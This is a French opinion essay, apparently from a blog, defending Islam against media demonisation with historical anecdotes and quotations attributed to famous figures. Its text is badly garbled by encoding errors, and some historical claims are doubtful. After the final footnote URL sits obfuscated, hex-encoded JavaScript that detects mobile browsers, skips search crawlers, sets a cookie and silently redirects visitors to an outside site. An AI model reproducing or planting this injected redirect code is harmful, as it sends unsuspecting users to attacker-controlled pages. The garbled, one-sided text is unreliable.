Aujourd’hui, l’Islam est un phA�nomA?ne mA�diatique prA�sentA� sans relA?che surtout depuis le 11 septembre 2001. En gA�nA�ral, on le prA�sente sous des formes erronA�es et nocives. Cet acharnement mA�diatique sur l’image de l’Islam et cette volontA� de cacher A� tout prix l’Islam ou de le montrer sous des formes dA�formA�es ne me semble pas anodin et pourtant nombreux sont ceux qui se font avoir.

Dans une approche panoramique du Moyen-Age, A� l’A?re noire de l’Occident, on peut aisA�ment remarquer que l’Islam faisait briller la face de l’humanitA�, dans toute sa splendeur, et de ceux qui avaient eu la��opportunitA� de le considA�rer A� sa juste valeur. Si bien que des A�crivains voyageurs, comme Voltaire, ayant A�crit leur rA?ve d’une sociA�tA� utopique ont dA� avouer que leur utopie n’en A�tait pas une, suite A� leur visite dans les sociA�tA�s de l’Islam. En effet, c’est lA� qu’ils avaient retrouvA� la justice, la paix sociale, le bien-A?tre qu’ils recherchaient en vain dans leurs contrA�es. (1)

Les historiens spA�cialisA�s de cette pA�riode vous le diront (2) ; l’A�glise, mA?lA�e au pouvoir politique de l’A�poque envenimait les consciences face aux dangers imaginaires de l’Islam. On prA�sentait dA�jA� les musulmans comme des barbares, non-humains, horribles, sauvages, monstrueux et j’en passe. A une A�poque oA? l’on vendait le paradis contre de l’argent, le citoyen moyen n’avait pas la possibilitA� de vA�rifier les discours de l’A�glise, ceux-ci attisaient sa haine et le prA�parait aux croisades qui A�taient prA�sentA�es comme des « guerres saintes ».

Cette stratA�gie avait fonctionnA� jusqu’au moment oA? ces paysans allumA�s face aux musulmans de l’A�poque ont dA�couvert le vrai visage de ceux-ci aprA?s les avoir rencontrA�s durant les croisades. Par exemple, Richard Coeur de Lion, qui A�tait A� la tA?te des croisA�s,  a affirmA� la grandeur de Saladin en disant qu’il n’affronterait plus des gens aussi respectables, humbles et honorables. (3) En effet, quand Richard fut blessA�,  Saladin offrit le service de son mA�decin personnel Maimonide, A� Arsuf; quand Richard perdit son cheval, Saladin lui en envoya deux en remplacement. Une fois que la vA�ritA� ait A�clatA�, la bienveillance grandissante de la��Islam a conquA�t le cA�ur de ceux qui ne savaient pas ou qui A�taient dans le doute.

Si l’on compare avec ce qui sa��est passA� A� la conquA?te de la Mecque plutA?t; lA� oA? les ennemis jurA�s de la��Islam ont vu leur cA�ur remplis de haine fondre face au « caractA?re divin » des compagnons de notre prophA?te(i�?),on peut remarquer le mA?me phA�nomA?ne .(4)En effet,Abou Soufyan, le chef de la Mecque avait utilisA� tous les moyens possibles et imaginables pour discrA�diter le message de l’islam et provoquer la rupture dans le mouvement des premiers croyants de Mouhammad(i�?), sans succA?s.Une poignA�e de « croyant » ,chassA� injustement de leur foyer, avait renversA� son systA?me injuste et l’avait reconquis sans batailles et sans vengeances.Cet A�vA�nement historique ,A� elle seule, montre la grandeur du « caractA?re musulman ».

Mahatma Gandhi(5) ayant recherchA� sincA?rement le vrai visage de la��Islam na��a pas hA�sitA� A� dA�clarer : A� Je suis dA�sormais plus que jamais convaincu que ce na��A�tait pas la��A�pA�e qui crA�ait une place pour la��Islam dans le cA�ur de ceux qui cherchaient une direction A� leur vie. Ca��A�tait cette grande humilitA�, cet altruisme du prophA?te, la��A�gard scrupuleux envers ses engagements, sa dA�votion intense A� ses amis et adeptes, son intrA�piditA�, son courage, sa confiance absolue en Dieu et en sa propre mission. A�

On pourrait citer des centaines da��affirmations de personnalitA�s historiques cA�lA?bres sur la��essence de la��Islam : Goethe(6), Victor Hugo(7), Montesquieu(8), Lamartine(9), Jean Paul 2(10), Nietzsche(11), et bien da��autres. En tant que musulman, je ne peux que saluer la grandeur da��esprit de ces grands hommes historiques ,non pas parce qu’ils disent du bien de ma religion, mais bien pour leur luciditA� et leur courage face aux actes de dA�nigrement  injuste des gens de leur A�poque.

Si la��on considA?re ces quelques faits historiques et que la��Histoire est une continuelle rA�pA�tition, ce qui est arrivA� avant peut se manifester A� nouveau aujourd’hui. (12)

Par ailleurs, cette affirmation historique de NapolA�on Bonaparte me fait rA�flA�chir sur la mission de la��Islam qui est celle de guider les Hommes vers une vie de paix : A� Ja��espA?re que le moment ne tardera pas oA? je pourrai rA�unir tous les hommes sages et instruits du pays, et A�tablir un rA�gime uniforme, fondA� sur les principes de la��Alcoran qui sont les seuls vrais et qui peuvent seuls faire le bonheur des hommes. A�(13)

De nos jours, nous vivons les mA?mes diabolisations d’antan de l’Islam avec des stratA�gies modernes. Pourtant l’Islam est toujours lA� et n’attend que d’A?tre vA�cu A� sa juste valeur pour rA�pondre A� nouveau aux besoins de la��Homme. En effet, l’HumanitA� a dA�veloppA� et essayA� plusieurs systA?mes de sociA�tA� pour vivre heureux, en paix et en justice : la doctrine de l’A�glise, le socialisme, le capitalisme, le nA�o-capitalisme, le nA�o-libA�ralisme… aucun d’eux n’a rA�pondu A� ces besoins humains fondamentaux. Il y a de plus en plus de droguA�s, de suicides, d’A�clatement familial, de crimes, de mal-A?tre… les chiffres sont hallucinants !(14)

Et, si l’on essayait de vivre l’Islam tel qu’enseignA� et vA�cu par le meilleur des Hommes (i�?)?

 

 

(1) « Le plus grand changement que la��opinion ait produit sur notre globe fut la��A�tablissement de la religion de Mahomet. Ses musulmans, en moins da��un siA?cle, conquirent un empire plus vaste que la��empire romain.

Cette rA�volution, si grande pour nous, na��est, A� la vA�ritA�, que comme un atome qui a changA� de place dans la��immensitA� des choses, et dans le nombre innombrable de mondes qui remplissent la��espace; mais ca��est au moins un A�vA�nement qua��on doit regarder comme une des roues de la machine de la��univers, et comme un effet nA�cessaire des lois A�ternelles et immuables: car peut-il arriver quelque chose qui na��ait A�tA� dA�terminA� par le MaA�tre de toutes choses? Rien na��est que ce qui doit A?tre. »

 

Remarque pour servir de supplA�ment A� l’Essais sur les MA�urs A� (1763), dans Oeuvres complA?tes de Voltaire, Voltaire, A�d. Moland, 1875, t. 24, chap. IX-De Mahomet, p. 588

 

(2) Jean-Marie Sansterre-ULB

(3) http://www.templiers.net/saladin/index.php?page=24-philippe-et-richard-contre-saladin

(4) https://en.wikipedia.org/wiki/Conquest_of_Mecca

(5) https://fr.wikiquote.org/wiki/Wikiquote: Accueil

(6) C’est dans l’Islam que je trouve le mieux exprimA�es mes propres idA�es.( Goethe, 20 septembre 1820, Lettre A� Zelter, dans Goethe et l’Islam, paru dans Studia Islamica, No. 33 (1971), p. 151, G.-H. Bousquet.)

(7) Extrait de « La LA�gende des siA?cles » PremiA?re serie , III « La��Islam: La��An neuf de la��HA�gire  » ( au sujet du prophA?te muhammad)

(8) Extrait de  » LETTRE Persane XXXIX « . HAGI IBBI AU JUIF BEN JOSUE, PROSELYTE MAHOMETAN. A Smyrne

(9)Philosophe, orateur, apA?tre, lA�gislateur, guerrier, conquA�rant d’idA�es, restaurateur de dogmes rationnels, d’un culte sans images, fondateur de vingt empires terrestres et d’un empire spirituel, voilA� Mahomet.(A� Histoire de la Turquie A� 1er Tome).

(10) Discours de Casablanca le 19 Aout 1985

(11) La��AntA�christ (1888)

(12) Hegel: La Raison dans l’histoire,H. Marrou: De la connaissance historique

Aron: Introduction A� la philosophie de l’histoire

Paul Ricoeur: Histoire et vA�ritA� de Lubac: Paradoxes page 127

Paul Clavier: La raison Coll. « Optiques » de Hatier pages 42 et 43.

(13) Source : Correspondance de NapolA�on, Journal de Sainte HA�lA?ne

(14) https://www.planetoscope.com/mortalite/1200-homicides-commis-dans-le-monde.htmlvar _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}